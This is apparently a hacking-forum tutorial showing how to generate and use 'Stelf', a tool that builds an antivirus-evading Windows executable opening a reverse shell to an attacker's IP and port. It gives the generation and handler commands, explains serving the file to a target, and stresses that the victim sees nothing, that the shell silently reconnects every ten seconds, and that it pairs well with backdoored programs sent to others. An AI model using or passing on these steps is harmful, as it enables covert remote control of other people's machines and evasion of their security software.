Getting Stealthy with Stelf

Hello 0x00’ers!

In this tutorial, I am going to be giving away some content that has been sought after for a long time. Everybody knows that most prebuilt tools such as Metasploit don’t work, payloads generated by them, or encoders used with them. They get picked up by anti-virus, they get stuck in filters, using them generally will give you a bad time no matter how many awkward tutorials you follow.

This is not because they are badly written, no, they are very good tools. The problem though lies in the fact that they are very popular. Anti-Virus packages work on blacklists, and when thousands of newbie hackers are generating payloads in the masses, they soon get added to these blacklists. Making all that hard work moot.

I am going to show you how to use literally one of the easiest tools written by @Joe_Schmoe.

Downloading Stelf

Go over to the gitlab and get a copy.

Once that’s downloaded, unzip the file and you’re ready for the next step.

Generating your Stelf Payload

python2 encode.py yourip theport outputfilename.exe

Replace these values with the ones you will need. In my case it looks like this

python2 encode.py 192.168.1.89 8080 scaryfile.exe

It will also ask you if you want to start a webserver for better sharing purposes. You can enter “y” and hit enter to do this.

Once you’ve transferred your executable wherever you may need it, start the handler and you’ll be ready to go.

Using Stelf

Fire up the handler with python2 handler.py and then just open the file.

In my case I had a shell open up before from persistence on this machine. I’ve been testing stelf on this VM before.

There’s no point me posting an image of the windows machine because nothing happens, you just click it and nothing appears to happen (it opens in the background). This behavior is nice as it will work with backdoored programs really nicely. You’ll never know it was there.

The shell will attempt a reconnection every 10 seconds. And doesn’t require any other code. It is completely self-contained. Theoretically, you could send this to somebody, never open your handler, and providing they don’t shutdown their computer to kill the process, you can open your handler any time and get a shell.

In future, it may be possible to make it run persistence when it is first opened.

Quick Stelf Commands

l - List sessions

i - Interact with sessions

ctrl+c - Background session

Once inside a session the ‘help’ command will show you the way. Also, remember this is a normal shell too, so typing any windows cmd command will work.

I hope this helps you out, also I hope you guys realise how powerful Stelf is. Especially since it doesn’t get picked up by any AV without even needing an encoder (encoders look fishy).

@Joe_schmoe has poured his heart and soul into this, and to just finally show it off to the world is really rewarding.

That’s all for day guys!

- pry0cc